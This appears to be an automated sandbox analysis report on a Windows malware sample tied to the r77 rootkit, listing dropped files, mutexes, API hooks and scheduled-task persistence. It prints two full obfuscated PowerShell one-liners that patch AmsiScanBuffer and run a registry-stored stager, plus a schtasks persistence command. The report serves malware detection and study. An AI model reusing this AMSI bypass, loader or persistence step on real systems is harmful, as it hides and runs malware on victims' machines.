Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7020:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMutant created: \Sessions\1\BaseNamedObjects\9D16FBEF0D8A8F87529DE06A1C43C737
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2280:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6028:120:WilError_01
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
Source: 2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack, u000fu2001.csCryptographic APIs: 'CreateDecryptor'
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
Source: 5.2.AppLaunch.exe.400000.0.unpack, u000fu2001.csCryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\34432.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Install.exeStatic file information: File size 4713759 > 1048576
Source: Install.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\Install.pdb source: 34432.exe, 00000004.00000002.371180159.000000001702D000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 00000016.00000000.330232590.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000000.329876550.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\r77-x86.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\InstallService64.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.463366324.000002C8902E9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe
Source: Binary string: x64.pdb source: svchost.exe
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\InstallService32.pdb source: powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\InstallStager\obj\x64\Release\InstallStager.pdb source: 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356818562.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356782565.0000000003991000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.468321947.000002C8EBC93000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: N\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000002.225232923.0000000000113000.00000004.00000010.00020000.00000000.sdmp, ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000003.224694291.0000000002672000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: RYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe

Data Obfuscation

Source: 2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack, u0003u2001.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.AppLaunch.exe.400000.0.unpack, u0003u2001.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: NewEngineState=Availablefunction Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: {$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: {$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: {$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E40070C pushad ; ret
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E4006CE pushad ; ret
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E4035CF push cs; iretd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E3F7317 push ebx; iretd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E3F5097 push eax; iretd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E3F44E7 push esp; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E4C5274 pushad ; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E4C5F76 push ebx; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E4C5C3C push esi; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E4C6156 push ecx; retf
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000E228 push rax; retf
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014001439D push rcx; retf 003Fh
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFF7E3E6450 push ebx; iretd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFF7E3E41C7 push esp; retf
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F070C pushad ; ret
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F06CE pushad ; ret
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F70FA push ebp; retf
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F35CF push cs; iretd
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E40070C pushad ; ret
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E4006CE pushad ; ret
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E4035CF push cs; iretd
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400146AD push rcx; retf 003Fh
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000E348 push rax; retf
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000E350 push rax; retf
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCE94CD push rcx; retf 003Fh
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD142D8 push rax; retf
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD1A6CD push rcx; retf 003Fh
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B994CD push rcx; retf 003Fh
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BC42D8 push rax; retf
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CE94CD push rcx; retf 003Fh
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D142D0 push rax; retf
Source: ChiefKeefofficialnaxyi_crypted(6).exe.1.drStatic PE information: section name: .nQuHRq
Source: ChiefKeefofficialnaxyi_crypted(6).exe.1.drStatic PE information: section name: .9SAT
Source: initial sampleStatic PE information: section name: .9SAT entropy: 6.83589844593

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Source: C:\Users\user\Desktop\Install.exeFile created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
Source: C:\Users\user\AppData\Roaming\34432.exeFile created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\Desktop\Install.exeFile created: C:\Users\user\AppData\Roaming\34432.exe

Boot Survival

Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: C:\Windows\System32\nslookup.exeFile created: C:\Windows\Tasks\nslooksvc32.job

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exe | User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x93 0x33 0x35 0x5D 0xDF
Source: C:\Windows\System32\nslookup.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node nslookstager
Source: C:\Windows\System32\winlogon.exe | Code function: 42_2_000001AFDDD01F20 GetCurrentThread,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\Install.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
